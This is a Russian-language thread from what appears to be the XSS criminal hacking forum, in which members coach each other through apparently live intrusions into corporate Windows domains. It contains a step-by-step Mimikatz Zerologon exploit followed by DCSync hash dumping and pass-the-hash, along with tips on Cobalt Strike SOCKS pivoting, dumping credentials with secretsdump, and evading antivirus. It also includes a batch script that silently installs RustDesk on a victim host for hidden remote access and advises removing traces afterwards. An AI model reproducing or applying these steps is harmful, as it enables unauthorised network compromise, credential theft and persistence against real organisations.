• XSS.stack #1 – первый литературный журнал от юзеров форума

[net-hacking] Вопросы по сетям

Доступа к DC нету, там я так понял AV стоит, и только конкретные креды подходят, сегодня попробую, если меня не спалили))) Я там слишком много раз make token проворачивал, я думаю ещё, там есть две машины которые теоретически тоже взять можно и там тоже ав, McAfee endpoint security(это я на других машинах увидел на рабочем столе), Вообщем Спасибо, попробую, мне же для зерологона надо чтобы именно DC уязвим был? Мне кажется через учётку админа легче получить, а учетка админа вероятно на ДС.
Да, для зерологона должен быть уязвим ДС. Через мимикатз можно чекнуть ДС на уязвимость. И, чтобы провести зерологон, прямой доступ к ДС не нужен, если что
 
Доступа к DC нету, там я так понял AV стоит, и только конкретные креды подходят, сегодня попробую, если меня не спалили))) Я там слишком много раз make token проворачивал, я думаю ещё, там есть две машины которые теоретически тоже взять можно и там тоже ав, McAfee endpoint security(это я на других машинах увидел на рабочем столе), Вообщем Спасибо, попробую, мне же для зерологона надо чтобы именно DC уязвим был? Мне кажется через учётку админа легче получить, а учетка админа вероятно на ДС.
У тебя уязвимый к zerologon дк, и ты не знаешь что делать дальше?

Код:
открываем в цмд мимик, прописываем
privilege::debug

проверяем
lsadump::zerologon /targetC01.LAB.LOCAL /accountC01$

пробиваем
lsadump::zerologon /targetC01.LAB.LOCAL /accountC01$ /exploit

снимаем хеши
lsadump::dcsync /domain:LAB.LOCAL /dcC01.LAB.LOCAL /user:krbtgt /authuserC01$ /authdomain:LAB /authpassword:"" /authntlm
lsadump::dcsync /domain:LAB.LOCAL /dcC01.LAB.LOCAL /user:Administrator /authuserC01$ /authdomain:LAB /authpassword:"" /authntlm

проводим pth
sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN

Это все можно реализовать по впн\соксу
 
Последнее редактирование:
Приветствую. Получил доступ к локал админу, как можно продвинуться и получить домен админа? При создании домен админа с cmd ошибку выдает
больше вводных
Удивительно, что при попытке создать ДА от ЛА у тебя выдает ошибку, наверное даже не с домен контроллера добавлял? Иерархия прав в домене подразумевает, что ЛА - начальник отдела, ДА зам директора, ЕА директор
Для начала тебе нужны креды\хеши реальных юзеров, если ты получил права путем создания окололокального админа, попробуй старый добрый мимкатз и может тебе повезет) Если твой локальный админ "местный", то пройдись им по той же схеме по другим хостам, где он имеет права
ЛА - начальник отдела? 0_о это по компьютеру на отдел получается
Может знает кто как RDP поставить? Есть External address, есть внутренний, через кобу socks 7777 запустил, через proxifier попытался подключиться не получилось(к самим прокси). Сам ip пингуется, все нормально, может че не догоняю
в проксифаере указывал что сокс 4 версии? байкон живой на котором сокс? что значит "поставить" рдп? кого именно ты пинговал? ничего не понятно)
 
в проксифаере указывал что сокс 4 версии? байкон живой на котором сокс? что значит "поставить" рдп? кого именно ты пинговал? ничего не понятно)
В Proxifier socks4a, живой, поставить имел введу попасть, ночью уже не соображал, пинговал external ip, зачем - не знаю.

Authentication: KO -- maybe not vulnerable, dc не уязвим как понимаю
 
В Proxifier socks4a, живой, поставить имел введу попасть, ночью уже не соображал, пинговал external ip, зачем - не знаю.

Authentication: KO -- maybe not vulnerable, dc не уязвим как понимаю
да не уязвим, проверь виден ли рдп с той тачки на которой ты поднимаешь сокс, если все ок. Поднимаешь сокс на 8080, в проксифаере в настройках прокси-сервера указываешь ипак кобы\прокладки + порт 8080
в рдп клиенте указываешь локальный ипак сервера к которому ты собрался рубиться, так будто ты в одной сети с ним находишься - должно сработать, бывает такое что у тебя на прокладке стоит фаер, и ипак твоего рабочего сервера попал в блеклист

Ты можешь по соксу через импакетовский secretsdump сдампить сэмы с машин на которых ЛА, без захода на рдп)
а так если есть контекст ад - проверяешь на топ вульны с ад контекстом, если нету то мс17 и сторонние сервисы\принтеры\линуксы
 
да не уязвим, проверь виден ли рдп с той тачки на которой ты поднимаешь сокс, если все ок. Поднимаешь сокс на 8080, в проксифаере в настройках прокси-сервера указываешь ипак кобы\прокладки + порт 8080
в рдп клиенте указываешь локальный ипак сервера к которому ты собрался рубиться, так будто ты в одной сети с ним находишься - должно сработать, бывает такое что у тебя на прокладке стоит фаер, и ипак твоего рабочего сервера попал в блеклист

Ты можешь по соксу через импакетовский secretsdump сдампить сэмы с машин на которых ЛА, без захода на рдп)
а так если есть контекст ад - проверяешь на топ вульны с ад контекстом, если нету то мс17 и сторонние сервисы\принтеры\линуксы
Все, попал, спасибо огроменное! Попробуем щас что нибудь)
 
А знает кто почему коба не все таргеты показывает? тут очень много компов, как мне на них пивотится если не видет он? Вроде первоначальные хосты есть, а остальные где
 
Последнее редактирование:
А знает кто почему коба не все таргеты показывает? тут очень много компов, как мне на них пивотится если не видет он? Вроде первоначальные хосты есть, а остальные где
а чем ты сморишь их? не знаю, что за доступ у тебя, но в общих чертах, политика фаерволла может резать трафик в другие подсетки, тот же пинг, но арп может пролезать. т.е. не в кобе дело.
еще хорошо бы посмотреть что за софт там стоит. едр могут блокировать траф, когда видят, что простук ведется.
 
Всех приветсвую!

Если есть доступ к командной строке хоста через impaket как можно реализовать доступ к gui рабочего стола?

Пробовал rustdesk. Нет инфы как параментры подключения потом взять из запущенного процесса через cmd
На хосте есть возможность запускать нагрузки из msfvenom`a. Помню вроде был какой то модуль в метасплоите, найти не могу какой.
Может ещё какой то альтернативный софт есть для работы с ним через cmd?
 
Всех приветсвую!

Если есть доступ к командной строке хоста через impaket как можно реализовать доступ к gui рабочего стола?

Пробовал rustdesk. Нет инфы как параментры подключения потом взять из запущенного процесса через cmd
На хосте есть возможность запускать нагрузки из msfvenom`a. Помню вроде был какой то модуль в метасплоите, найти не могу какой.
Может ещё какой то альтернативный софт есть для работы с ним через cmd?
AnyDesk
 
Всех приветсвую!

Если есть доступ к командной строке хоста через impaket как можно реализовать доступ к gui рабочего стола?

Пробовал rustdesk. Нет инфы как параментры подключения потом взять из запущенного процесса через cmd
На хосте есть возможность запускать нагрузки из msfvenom`a. Помню вроде был какой то модуль в метасплоите, найти не могу какой.
Может ещё какой то альтернативный софт есть для работы с ним через cmd
делаешь батник и запускаешь на выходе получаешь id и пасс, и не забудь удалить на раб. столе юзера от которого запускал линк на rustdesk
@echo off

REM Assign the value random password to the password variable
setlocal ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
set alfanum=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
set rustdesk_pw=
for /L %%b in (1, 1, 12) do (
set /A rnd_num=!RANDOM! %% 62
for %%c in (!rnd_num!) do (
set rustdesk_pw=!rustdesk_pw!!alfanum:~%%c,1!
)
)

REM Get your config string from your Web portal and Fill Below
set rustdesk_cfg="configstring"

REM ############################### Please Do Not Edit Below This Line #########################################

if not exist C:\Temp\ md C:\Temp\
cd C:\Temp\

curl -L "https://github.com/rustdesk/rustdesk/releases/download/1.2.3/rustdesk-1.2.3-x86_64.exe" -o rustdesk.exe

rustdesk.exe --silent-install
timeout /t 20

cd "C:\Program Files\RustDesk\"
rustdesk.exe --install-service
timeout /t 20

for /f "delims=" %%i in ('rustdesk.exe --get-id ^| more') do set rustdesk_id=%%i

rustdesk.exe --config %rustdesk_cfg%

rustdesk.exe --password %rustdesk_pw%

echo ...............................................
REM Show the value of the ID Variable
echo RustDesk ID: %rustdesk_id%

REM Show the value of the Password Variable
echo Password: %rustdesk_pw%
echo ...............................................
 
Привет всем. Повысил свои права в домене через добавления себя в группу с опр. возможностями, хотел через writedacl получить юзерку которая может через RDP залететь на DC, все получилось керберос хеш брутанул, но вот беда: To sign in remotely, you need... Через psexec попытался - Error_access_denied. Других юзеров тоже попробовал. Знает кто что сделать можно?
 
Еще вопрос, вот в кобальте есть хеш Administrator, судя по всему все это время этот Administrator мог заходить на самый главный домен(потому что от него идет вся ветка эта), я пытался через psexec прокинуть сессию, в итоге Impersonated VQ-BRC\Administrator, Could not start service 065c213 on VQ-VBR: 225, крч AV блочит я так понял, но что сделать с этим можно? хеш не получилось сбрутить, пытаться в rdp залететь и ps1 скрипт прокинуть? Хотя вроде блочиться сам сервис. Мне хотя бы mimikatz туда дропнуть и execut'тнуть

Как я понял, мне надо AV bypass'нуть, но я реально хз как, в кобе мб artifact kit или что, может знает кто? Буду благодарен
 
Последнее редактирование:
Еще вопрос, вот в кобальте есть хеш Administrator, судя по всему все это время этот Administrator мог заходить на самый главный домен(потому что от него идет вся ветка эта), я пытался через psexec прокинуть сессию, в итоге Impersonated VQ-BRC\Administrator, Could not start service 065c213 on VQ-VBR: 225, крч AV блочит я так понял, но что сделать с этим можно? хеш не получилось сбрутить, пытаться в rdp залететь и ps1 скрипт прокинуть? Хотя вроде блочиться сам сервис. Мне хотя бы mimikatz туда дропнуть и execut'тнуть

Как я понял, мне надо AV bypass'нуть, но я реально хз как, в кобе мб artifact kit или что, может знает кто? Буду благодарен
Была же ветка где то на эту тему, с разбором
 
Возможно ли взломать сеть не на проникновение а на замену? можно ли сделать "прокладку" между браузером и сервером чтоб сглаживать и менять в автоматическом порядке отправляемые данные, следуя заранее настроенному алгоритму? если возможно, кратко какие этапы нужно пройти?
 
Возможно ли взломать сеть не на проникновение а на замену? можно ли сделать "прокладку" между браузером и сервером чтоб сглаживать и менять в автоматическом порядке отправляемые данные, следуя заранее настроенному алгоритму? если возможно, кратко какие этапы нужно пройти?
DNS spoofing, постарался максимально кратко и понятно
 
Пожалуйста, обратите внимание, что пользователь заблокирован
всем привет подскажите плжалуйста
с root доступом на серваке корпы что делать ?(простой linux или esxi)
какие дальнейшие шаги предпринять
 
всем привет подскажите плжалуйста
с root доступом на серваке корпы что делать ?(простой linux или esxi)
какие дальнейшие шаги предпринять
Для начала определить что это за сервак на котором ты находишься и можешь ли ты полезную информацию достать от туда, бд, креды и тд...
Вторым шагом прокинуть прокси к себе для того чтобы искать уязвимости внутри сети вне сервера
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх